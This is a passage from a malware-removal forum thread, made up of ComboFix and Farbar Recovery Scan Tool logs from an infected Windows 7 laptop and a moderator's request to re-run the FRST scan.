    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\KzShlobj2]
    @="{AAA0C5B8-933F-4200-93AD-B143D7FFF9F3}"
    [HKEY_CLASSES_ROOT\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F3}]
    2016-09-19 00:09 560768 ------w- c:\program files (x86)\KuaiZip\X64\KZipShell.dll
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Apoint"="c:\program files\DellTPad\Apoint.exe" [2012-06-19 626552]
    "IgfxTray"="c:\windows\system32\igfxtray.exe" [2012-11-09 168216]
    "HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2012-11-09 391960]
    "Persistence"="c:\windows\system32\igfxpers.exe" [2012-11-09 419096]
    "SysTrayApp"="c:\program files\IDT\WDM\sttray64.exe" [2011-02-16 525312]
    .
    ------- Supplementary Scan -------
    .
    uLocal Page = c:\windows\system32\blank.htm
    uStart Page = hxxp://www.cloudynights.com/page/index.html
    mLocal Page = c:\windows\SysWOW64\blank.htm
    mStart Page = www.google.com
    IE: E&xport to Microsoft Excel - c:\program files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE/3000
    IE: Se&nd to OneNote - c:\program files (x86)\Microsoft Office\Root\Office16\ONBttnIE.dll/105
    Trusted Zone: localhost
    TCP: DhcpNameServer = 192.168.0.1 24.200.241.37 24.202.72.13
    Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - c:\program files (x86)\Microsoft Office\root\Office16\MSOSB.DLL
    Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - c:\program files (x86)\Microsoft Office\root\Office16\MSOSB.DLL
    Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - c:\program files (x86)\Microsoft Office\root\Office16\MSOSB.DLL
    Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - c:\program files (x86)\Microsoft Office\root\Office16\MSOSB.DLL
    FF - ProfilePath - c:\users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\
    FF - prefs.js: browser.search.selectedEngine - Search Module
    .
    - - - - ORPHANS REMOVED - - - -
    .
    Toolbar-Locked - (no file)
    Wow6432Node-HKCU-Run-MHX680O3EE - c:\program files (x86)\DPower\F10H5ROMJR.exe
    Wow6432Node-HKCU-Run-UD8BS0RW9M - c:\program files (x86)\DPower\OMAX7YIRM1.exe
    Wow6432Node-HKCU-Run-MP86W16DCV - c:\program files (x86)\DPower\NFQMP4E7QL.exe
    Wow6432Node-HKCU-Run-ID9KZOQAXP - c:\program files (x86)\DPower\NMJA5FXU1Z.exe
    Wow6432Node-HKCU-Run-R3TEGTCHQT - c:\program files (x86)\DPower\D7HVZHU1UW.exe
    BHO-{7B6678FD-F9E3-46FD-aCF0-4C011573F737} - c:\program files\Icatti\Orosbusf64.dll
    Toolbar-Locked - (no file)
    .
    .
    .
    --------------------- LOCKED REGISTRY KEYS ---------------------
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\User Preferences]
    @Denied: (2) (Administrator)
    "88D7D0879DAB32E14DE5B3A805A34F98AFF34F5977"=hex:01,00,00,00,d0,8c,9d,df,01,15,
    d1,11,8c,7a,00,c0,4f,c2,97,eb,01,00,00,00,87,d7,78,16,58,5c,04,4a,8a,f1,62,\
    "2D53CFFC5C1A3DD2E97B7979AC2A92BD59BC839E81"=hex:01,00,00,00,d0,8c,9d,df,01,15,
    d1,11,8c,7a,00,c0,4f,c2,97,eb,01,00,00,00,87,d7,78,16,58,5c,04,4a,8a,f1,62,\
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3g2\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.3G2"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.3GP"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp2\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.3G2"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gpp\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.3GP"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.AAC\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.ADTS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ADT\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.ADTS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ADTS\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.ADTS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.AIFF"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.AIFF"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.AIFF"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.asf\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.ASF"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.asx\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.ASX"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.AU"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.avi\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.AVI"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cda\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.CDA"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="FirefoxHTML"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="FirefoxHTML"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpg\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="OISjpegfile"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m1v\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.M2T\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.M2TS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.M2TS\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.M2TS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.M2V\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.m3u"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4a\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.M4A"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4v\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MP4"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="IE.AssocFile.MHT"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="IE.AssocFile.MHT"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MIDI"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.midi\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MIDI"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MOD\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mov\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MOV"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp2\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MP3"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp2v\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp3\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MP3"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp4\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MP4"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp4v\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MP4"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpa\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpe\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpeg\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpg\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpv2\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MPEG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MTS\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.M2TS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.partial\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="IE.AssocFile.PARTIAL"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.MIDI"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="FirefoxHTML"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.AU"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="IE.AssocFile.SVG"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.TS\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.TTS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.TTS\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.TTS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.url\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="IE.AssocFile.URL"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WAV"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wax\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WAX"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.website\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="IE.AssocFile.WEBSITE"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wm\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.ASF"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WMA"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmd\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WMD"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wms\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WMS"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmv\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WMV"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmx\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.ASX"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmz\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WMZ"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wpl\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WPL"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wvx\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="WMP11.AssocFile.WVX"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xht\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="FirefoxHTML"
    .
    [HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml\UserChoice]
    @Denied: (2) (Administrator)
    "Progid"="FirefoxHTML"
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
    @Denied: (A) (Everyone)
    "Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
    @Denied: (A) (Everyone)
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
    "Key"="ActionsPane3"
    "Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
    .
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
    @Denied: (Full) (Everyone)
    .
    ------------------------ Other Running Processes ------------------------
    .
    c:\windows\system32\DRIVERS\o2flash.exe
    c:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    c:\program files (x86)\Malwarebytes Anti-Malware\mbam.exe
    .
    **************************************************************************
    .
    Completion time: 2016-09-19 03:11:55 - machine was rebooted
    ComboFix-quarantined-files.txt 2016-09-19 07:11
    .
    Pre-Run: 248,515,768,320 bytes free
    Post-Run: 248,846,794,752 bytes free
    .
    - - End Of File - - 4B875B4F3B699F6D5C0E5D3E39E93041
    A36C5E4F47E84449FF07ED3517B43A31
     
  15. broni

    broni Malware Annihilator Techie7 Moderator Head Security

    Re-run the Farbar Recovery Scan Tool (FRST/FRST64) that you ran at the very beginning of this topic.

    • Double click to run it.
    • Make sure you checkmark the Addition.txt box.
    • Press the Scan button.
    • The scan will create two logs, FRST.txt and Addition.txt, in the same directory the tool is run from. Please copy and paste them into your reply.
     
  16. photiost

    photiost Established Techie7 Member

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-09-2016
    Ran by Administrator (administrator) on DELL35X8BT1 (19-09-2016 20:30:13)
    Running from C:\Users\Administrator\Downloads
    Loaded Profiles: Administrator (Available Profiles: Administrator)
    Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: FF)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
    (Microsoft Corporation) C:\Windows\System32\wlanext.exe
    (SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
    (Andrea Electronics Corporation) C:\Program Files\IDT\WDM\AESTSr64.exe
    (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
    (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
    (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
    (O2Micro International) C:\Windows\System32\drivers\o2flash.exe
    (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
    (Intel Corporation) C:\Windows\System32\igfxtray.exe
    (Intel Corporation) C:\Windows\System32\hkcmd.exe
    (Intel Corporation) C:\Windows\System32\igfxpers.exe
    (IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
    (SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
    (Global surveys) C:\Users\Administrator\AppData\Roaming\Interstatnogui\interstatnogui.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
    (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
    (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe


    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [626552 2012-06-18] (Alps Electric Co., Ltd.)
    HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [525312 2011-02-15] (IDT, Inc.)
    Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7943072 2016-09-12] (SUPERAntiSpyware)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [Chromium] => c:\users\administrator\appdata\local\chromium\application\chrome.exe [1068544 2016-03-18] (The Chromium Authors)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [Interstatnogui] => C:\Users\Administrator\AppData\Roaming\Interstatnogui\interstatnogui.exe [4110848 2016-09-18] (Global surveys)
    ShellIconOverlayIdentifiers: [KzShlobj2] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F3} => C:\Program Files (x86)\KuaiZip\X64\KZipShell.dll [2016-09-18] ()
    GroupPolicy: Restriction - Chrome <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 24.200.241.37 24.202.72.13
    Tcpip\..\Interfaces\{B4EC977B-3636-4217-8CA1-D8DE45EDD7B6}: [DhcpNameServer] 192.168.0.1 24.200.241.37 24.202.72.13
    Tcpip\..\Interfaces\{FE93FD32-9915-47D1-AB78-70D4CDC6F6D6}: [DhcpNameServer] 10.254.240.200 10.254.240.201

    Internet Explorer:
    ==================
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.cloudynights.com/page/index.html
    SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-09-05] (Microsoft Corporation)
    BHO: Icatti -> {7B6678FD-F9E3-46FD-aCF0-4C011573F737} -> C:\Program Files\Icatti\Orosbusf64.dll => No File
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
    BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-09-05] (Microsoft Corporation)
    BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2016-09-05] (Microsoft Corporation)
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
    BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)

    FireFox:
    ========
    FF ProfilePath: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default
    FF DefaultSearchEngine: Search Module
    FF SelectedSearchEngine: Search Module
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-09-05] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
